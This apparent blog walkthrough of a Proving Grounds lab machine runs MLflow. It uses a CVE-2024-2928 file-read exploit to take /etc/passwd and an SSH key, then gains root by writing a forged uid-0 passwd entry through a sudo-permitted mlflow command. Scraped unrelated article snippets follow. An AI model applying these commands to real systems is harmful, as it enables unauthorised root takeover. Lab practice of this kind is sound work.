nmap 
nmap -p- -A -T4 -sS 192.168.114.104

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-07 03:03 UTC

Nmap scan report for 192.168.114.104

Host is up (0.072s latency).

Not shown: 65533 filtered tcp ports (no-response)

PORT     STATE SERVICE VERSION

22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

|   256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)

|_  256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)

5000/tcp open  upnp?

| fingerprint-strings:

|   GenericLines:

|     HTTP/1.1 400 Bad Request

|     Connection: close

|     Content-Type: text/html

|     Content-Length: 193

|     <html>

|     <head>

|     <title>Bad Request</title>

|     </head>

|     <body>

|     <h1><p>Bad Request</p></h1>

|     Invalid Request Line 'Invalid HTTP request line: '''

|     </body>

|     </html>

|   GetRequest:

|     HTTP/1.0 200 OK

|     Server: gunicorn

|     Date: Tue, 07 Jan 2025 03:05:01 GMT

|     Connection: close

|     Content-Disposition: inline; filename=index.html

|     Content-Type: text/html; charset=utf-8

|     Content-Length: 615

|     Last-Modified: Mon, 02 Sep 2024 10:04:33 GMT

|     Cache-Control: no-cache

|     ETag: "1725271473.9912164-615-3603372807"

|     <!doctype html><html lang="en"><head><meta charset="utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no"/><link rel="shortcut icon" href="./static-files/favicon.ico"/><meta name="theme-color" content="#000000"/><link rel="manifest" href="./static-files/manifest.json"/><title>MLflow</title><script defer="defer" src="static-files/static/js/main.4dd3381c.js"></script><link href="static-files/static/css/main.6d30cbb0.css" rel="stylesheet"></head><body><noscript>You need to enable JavaScript to run this app.</noscript><div id="root"></div><di

|   HTTPOptions:

|     HTTP/1.0 200 OK

|     Server: gunicorn

|     Date: Tue, 07 Jan 2025 03:05:16 GMT

|     Connection: close

|     Content-Type: text/html; charset=utf-8

|     Allow: HEAD, OPTIONS, GET

|     Content-Length: 0

|   RTSPRequest:

|     HTTP/1.1 400 Bad Request

|     Connection: close

|     Content-Type: text/html

|     Content-Length: 196

|     <html>

|     <head>

|     <title>Bad Request</title>

|     </head>

|     <body>

|     <h1><p>Bad Request</p></h1>

|     Invalid HTTP Version 'Invalid HTTP Version: 'RTSP/1.0''

|     </body>

|_    </html>

1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

SF-Port5000-TCP:V=7.94SVN%I=7%D=1/7%Time=677C99DD%P=x86_64-pc-linux-gnu%r(

SF:GenericLines,11E,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20

SF:close\r\nContent-Type:\x20text/html\r\nContent-Length:\x20193\r\n\r\n<h

SF:tml>\n\x20\x20<head>\n\x20\x20\x20\x20<title>Bad\x20Request</title>\n\x

SF:20\x20</head>\n\x20\x20<body>\n\x20\x20\x20\x20<h1><p>Bad\x20Request</p

SF:></h1>\n\x20\x20\x20\x20Invalid\x20Request\x20Line\x20'Invalid\x20

SF:HTTP\x20request\x20line:\x20'''\n\x20\x20</body>\n</html

SF:>\n")%r(GetRequest,3A5,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r

SF:\nDate:\x20Tue,\x2007\x20Jan\x202025\x2003:05:01\x20GMT\r\nConnection:\

SF:x20close\r\nContent-Disposition:\x20inline;\x20filename=index\.html\r\n

SF:Content-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20615\

SF:r\nLast-Modified:\x20Mon,\x2002\x20Sep\x202024\x2010:04:33\x20GMT\r\nCa

SF:che-Control:\x20no-cache\r\nETag:\x20\"1725271473\.9912164-615-36033728

SF:07\"\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><meta\x20chars

SF:et=\"utf-8\"/><meta\x20name=\"viewport\"\x20content=\"width=device-widt

SF:h,initial-scale=1,shrink-to-fit=no\"/><link\x20rel=\"shortcut\x20icon\"

SF:\x20href=\"\./static-files/favicon\.ico\"/><meta\x20name=\"theme-color\

SF:"\x20content=\"#000000\"/><link\x20rel=\"manifest\"\x20href=\"\./static

SF:-files/manifest\.json\"/><title>MLflow</title><script\x20defer=\"defer\

SF:"\x20src=\"static-files/static/js/main\.4dd3381c\.js\"></script><link\x

SF:20href=\"static-files/static/css/main\.6d30cbb0\.css\"\x20rel=\"stylesh

SF:eet\"></head><body><noscript>You\x20need\x20to\x20enable\x20JavaScript\

SF:x20to\x20run\x20this\x20app\.</noscript><div\x20id=\"root\"></div><di")

SF:%r(RTSPRequest,121,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x

SF:20close\r\nContent-Type:\x20text/html\r\nContent-Length:\x20196\r\n\r\n

SF:<html>\n\x20\x20<head>\n\x20\x20\x20\x20<title>Bad\x20Request</title>\n

SF:\x20\x20</head>\n\x20\x20<body>\n\x20\x20\x20\x20<h1><p>Bad\x20Request<

SF:/p></h1>\n\x20\x20\x20\x20Invalid\x20HTTP\x20Version\x20'Invalid\x

SF:20HTTP\x20Version:\x20'RTSP/1\.0''\n\x20\x20</body>\n</h

SF:tml>\n")%r(HTTPOptions,B3,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicor

SF:n\r\nDate:\x20Tue,\x2007\x20Jan\x202025\x2003:05:16\x20GMT\r\nConnectio

SF:n:\x20close\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nAllow:\x

SF:20HEAD,\x20OPTIONS,\x20GET\r\nContent-Length:\x200\r\n\r\n");

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Device type: general purpose|specialized|storage-misc

Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (90%), Crestron 2-Series (86%), HP embedded (85%)

OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:crestron:2_series cpe:/o:linux:linux_kernel:3.13 cpe:/h:hp:p2000_g3

Aggressive OS guesses: Linux 4.15 - 5.8 (90%), Linux 5.0 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (89%), Linux 2.6.32 (89%), Linux 5.0 - 5.5 (88%), Crestron XPanel control system (86%), Linux 3.13 (86%), HP P2000 G3 NAS device (85%)

No exact OS matches for host (test conditions non-ideal).

Network Distance: 4 hops

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)

HOP RTT      ADDRESS

1   73.06 ms 192.168.45.1

2   73.01 ms 192.168.45.254

3   73.15 ms 192.168.251.1

4   73.14 ms 192.168.114.104

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 228.37 seconds

发现版本

搜索exp 看样子是个任意文件读取

https://github.com/nuridincersaygili/CVE-2024-2928/blob/main/CVE-2024-2928.py

尝试exp读取/etc/passwd



读取成功

尝试读取id_rsa



读取成功

提权阶段

sudo -l

/usr/local/bin/mlflow artifacts download -u * -d *

发现你sudo 运行这个命令

尝试运行

发现 报错 让我们 mlflow artifacts download --help 看看说明

大概看懂了

-u 指定下载的文件 -d 指定文件下载到哪个目录

这不就简单了

我们直接

先复制一份/etc/passwd

cp /etc/passwd ./passwd

然后将伪造的root用户写入

echo 'xxoo:$1$GWB36/lB$ncfgVGEio6XbCYeV53KcM0:0:0:asdasd:/root:/bin/bash' >> ./passwd

然后

sudo /usr/local/bin/mlflow artifacts download -u ./passwd -d /etc 将我们伪造的passwd 写入/etc目录

提权成功

flow pg walkthrough Intermediate的更多相关文章

  1. 学习笔记之Intermediate Python for Data Science | DataCamp

    Intermediate Python for Data Science | DataCamp https://www.datacamp.com/courses/intermediate-python ...

  2. Spring实战第八章学习笔记————使用Spring Web Flow

    Spring实战第八章学习笔记----使用Spring Web Flow Spring Web Flow是一个Web框架,它适用于元素按规定流程运行的程序. 其实我们可以使用任何WEB框架写流程化的应 ...

  3. Innovus教程 - Flow系列 - MMMC分析环境的配置概述(理论+实践+命令)

    本文转自:自己的微信公众号<集成电路设计及EDA教程> <Innovus教程 - Flow系列 - MMMC分析环境的配置概述(理论+实践+命令)>   轻轻走过,悄悄看过,无 ...

  4. [AI] 论文笔记 - CVPR2018 Super SloMo: High Quality Estimation of Multiple Intermediate Frames for Video Interpolation

    写在前面 原始视频(30fps) 补帧后的视频(240fps) 本文是博主在做实验的过程中使用到的方法,刚好也做为了本科毕设的翻译文章,现在把它搬运到博客上来,因为觉得这篇文章的思路真的不错. 这篇文 ...

  5. ICC教程 - Flow系列 - 概念系列 - ECO (理论+实践+脚本分享)

    本文转自:自己的微信公众号<集成电路设计及EDA教程> <ICC教程 - Flow系列 - 概念系列 - ECO (理论+实践+脚本分享)> 这篇推文讲一下数字IC设计中的po ...

  6. Git 在团队中的最佳实践--如何正确使用Git Flow

    我们已经从SVN 切换到Git很多年了,现在几乎所有的项目都在使用Github管理, 本篇文章讲一下为什么使用Git, 以及如何在团队中正确使用. Git的优点 Git的优点很多,但是这里只列出我认为 ...

  7. 简析服务端通过GT导入SHP至PG的方法

    文章版权由作者李晓晖和博客园共有,若转载请于明显处标明出处:http://www.cnblogs.com/naaoveGIS/ 1.背景 项目中需要在浏览器端直接上传SHP后服务端进行数据的自动入PG ...

  8. [LeetCode] Pacific Atlantic Water Flow 太平洋大西洋水流

    Given an m x n matrix of non-negative integers representing the height of each unit cell in a contin ...

  9. Bootstap datetimepicker报错TypeError: intermediate value

    Bootstrap datetimepicker有多个版本,官方的链接中,只是datepicker,没有时间的选择,原版的datetimepicker也不再更新,不能用新版的jquery.现在http ...

  10. BZOJ 4390: [Usaco2015 dec]Max Flow

    4390: [Usaco2015 dec]Max Flow Time Limit: 10 Sec  Memory Limit: 128 MBSubmit: 177  Solved: 113[Submi ...

随机推荐

  1. Gitlab运维操作

    部署 安装Postfix以发送通知邮件 yum install postfix 将postfix服务设置成开机自启动 systemctl enable postfix 启动postfix system ...

  2. getExplorerInfo:获取浏览器信息

    function getExplorerInfo() { let t = navigator.userAgent.toLowerCase(); return 0 <= t.indexOf(&qu ...

  3. element 动态合并表格---进阶版

    错误展示 正确展示 如果使用上次博客写的element 动态合并表格那么会出现上述图片情况,所以对其进行完善实现下图(正确展示)情况 处理函数 mergeTableRow(data, merge) { ...

  4. AI运动小程序开发常见问题集锦二

    截止到现在写博文时,我们的AI运动识别小程序插件已经迭代了23个版本,成功应用于健身.体育.体测.AR互动等场景:为了让正在集成或者计划进行功能扩展优化的用户,少走弯路.投入更少的开发资源,针对近期的 ...

  5. Java 并发编程实战学习笔记——串行任务转并行任务

    package net.jcip.examples; import java.util.Collection; import java.util.List; import java.util.Queu ...

  6. Kibana之基本使用

    介绍kibana经常使用的功能 查询: # 查询内容不为空的数据,并返回总数量 GET mp_article/_search?rest_total_hits_as_int=true { "q ...

  7. 鸿蒙ArkUI-X已更新适配API13啦

    ArkUI-X 5.0.1 Release版配套OpenHarmony 5.0.1 Rlease,API 13,新增适配部分API 13接口支持跨平台:框架能力进一步完善,支持Android应用非压缩 ...

  8. Javascript 标签的属性

    1.为HTML标签设置和添加属性 setAttribute() setAttribute()方法可以给HTML标签设置/添加属性(原生的属性或者自定义的属性都可以)添加的属性会存储在标签中 <! ...

  9. C#调用Python代码的方式(二),以PaddleOCR-GUI为例

    前言 前面介绍了在C#中使用Progress类调用Python脚本的方法,但是这种方法在需要频繁调用并且需要进行数据交互的场景效果并不好,因此今天分享的是C#调用Python代码的方式(二):使用py ...

  10. LocalLLaMA 客户端试验

    LM Studio. 可以直接下 hg 模型(实际使用需要自己修改成中国镜像). 有 local server, 符合 openai api 规范. 遗憾的是不支持选择显卡导致无法使用. Farada ...